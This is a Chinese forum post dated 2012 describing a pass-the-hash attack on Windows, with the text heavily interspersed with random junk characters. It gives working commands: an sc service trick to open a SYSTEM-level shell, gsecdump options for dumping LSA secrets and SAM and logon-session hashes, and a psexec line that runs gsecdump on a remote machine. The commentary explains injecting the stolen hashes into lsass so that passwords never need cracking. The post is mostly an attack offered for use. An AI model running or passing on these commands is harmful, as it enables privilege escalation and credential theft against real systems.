标题: HASH注入式攻击 [打印本页] 作者: admin 时间: 2012-11-6 21:09 标题: HASH注入式攻击 o get a DOS Prompt as NT system: 4 `( o7 }- f! g T: Z 2 }' W# _* p: ?! S4 c3 b4 p; c! hC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact # h% Y+ Z" m5 I' C1 g9 r[SC] CreateService SUCCESS+ { q; b! e2 M6 B
# P% A6 g: _ P* m& h
C:\>sc start shellcmdline : D N- ?" {1 U2 A, K X[SC] StartService FAILED 1053: 3 [$ b4 m) ^% A4 s9 }. a* T: \ o) O6 x% h5 E
The service did not respond to the start or control request in a timely fashion.; ^& j/ k/ l$ G: V7 V
5 D% C# }7 T' D. B3 g. E
C:\>sc delete shellcmdline! K. r5 V& K n, [& N) h( r) i
[SC] DeleteService SUCCESS 7 \* f" f$ }' g, o. f8 n& F2 ]) Y , O" [1 ^ x$ z; t/ j: l' g------------ - Y: y7 B8 t! q( b" v/ F1 E9 g- Q* N7 H# D( B- e
Then in the new DOS window: " [) K, r5 K9 X7 a. ?2 b; h- l' T5 K% ^' b! x
Microsoft Windows XP [Version 5.1.2600] ) s6 h# k8 E0 {6 {7 i# Y: q(C) Copyright 1985-2001 Microsoft Corp. . n, U2 l& [2 u W( {' B1 b- ~ q( q) x t
C:\WINDOWS\system32>whoami / T/ W0 m: {9 \& _& M! K( ^NT AUTHORITY\SYSTEM . e7 ]" s' G" u0 g @% e% `6 j5 }0 w1 M* ~9 i( `/ u0 f
C:\WINDOWS\system32>gsecdump -h& J0 }4 n6 e% n
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se) 2 b$ @ D& w; @% musage: gsecdump [options]% C [$ i2 l2 K8 \0 \
+ s: I& x0 e) { a# }0 [options:0 k4 V: J2 o/ H
-h [ --help ] show help9 {& B0 `6 O, s& s4 b+ L/ Q
-a [ --dump_all ] dump all secrets0 ` s3 D# q R/ ^3 Y: N
-l [ --dump_lsa ] dump lsa secrets " T# c, K8 D5 l1 K-w [ --dump_wireless ] dump microsoft wireless connections+ b) I. `8 r! V& N! d9 A
-u [ --dump_usedhashes ] dump hashes from active logon sessions 4 o* F& ?! N8 ]6 J-s [ --dump_hashes ] dump hashes from SAM/AD7 x/ f$ Y: z" Z' v! i
' R: S: R7 _) g6 A8 d6 `
Although I like to use: , N4 _7 {, ?/ l B2 }) c+ A/ \% f' Z4 M3 r0 l% A1 m) d
PsExec v1.83 - Execute processes remotely 5 ~: H8 J6 ~- LCopyright (C) 2001-2007 Mark Russinovich . a2 ~. m; m* g; Q( ?+ pSysinternals - 链接标记[url]www.sysinternals.com[/url] * u! ?/ p' t, f! o/ c3 O # ? l' x# x: U# D. N/ ^ f4 JC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT2 e9 ]2 x+ w0 M5 V$ A9 g* [
$ G3 M5 I9 u! t6 ?to get the hashes from active logon sessions of a remote system. % E7 O% m: y2 f* w Q J k3 ] 9 E0 B$ q! t* _: G ?; QThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables. ' |; w% E4 I i0 E$ `5 r( c: A9 i ( h% n7 f( u, M1 v提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.% T3 E2 d8 w1 ?$ t
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]- M& z; d/ j0 V5 Y; g/ Q1 d
" m4 ?0 j, g5 o) }9 m4 C& }( A9 J8 W
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。( `$ V$ k5 S0 Q& [